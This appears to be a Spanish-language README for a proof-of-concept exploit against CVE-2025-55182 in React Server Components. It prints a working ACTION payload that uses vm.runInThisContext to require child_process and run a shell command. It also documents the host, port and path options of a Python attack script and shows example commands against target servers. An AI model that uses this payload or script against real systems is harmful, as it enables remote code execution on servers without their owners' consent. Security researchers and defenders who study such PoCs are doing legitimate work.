
Exploit de prueba de concepto para CVE-2025-55182, que demuestra ejecución remota de código en React Server Components mediante payloads ACTION maliciosos e inyección de vm.runInThisContext.
Este proyecto es una Prueba de Concepto (PoC) para CVE-2025-55182 - Ejecución Remota de Código (RCE) en React Server Components (RSC), que demuestra cómo, bajo ciertas condiciones, se puede desencadenar ejecución remota de código mediante vm.runInThisContext y cargas útiles (payloads) ACTION maliciosas.
Las cargas útiles ACTION de React Server Components, bajo ciertas condiciones:
Un atacante puede construir el siguiente payload:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| Parámetro | Requerido | Valor por defecto | Descripción |
|---|
--host | Sí | Ninguno | IP o dominio del servidor objetivo. Ej: 127.0.0.1, 192.168.1.10, example.com |
--port | No | 80 | Puerto del servicio HTTP objetivo. Ej: 3003 |
--path | Sí | Ninguno | Ruta del endpoint vulnerable. Ej: /feedback, /action |
--https | No | False | Usar HTTPS para enviar el payload (por defecto HTTP) |
python a.py --host <目标IP> --port <端口> --path <目标URL路径>
python a.py --host 127.0.0.1 --port 3003 --path /feedback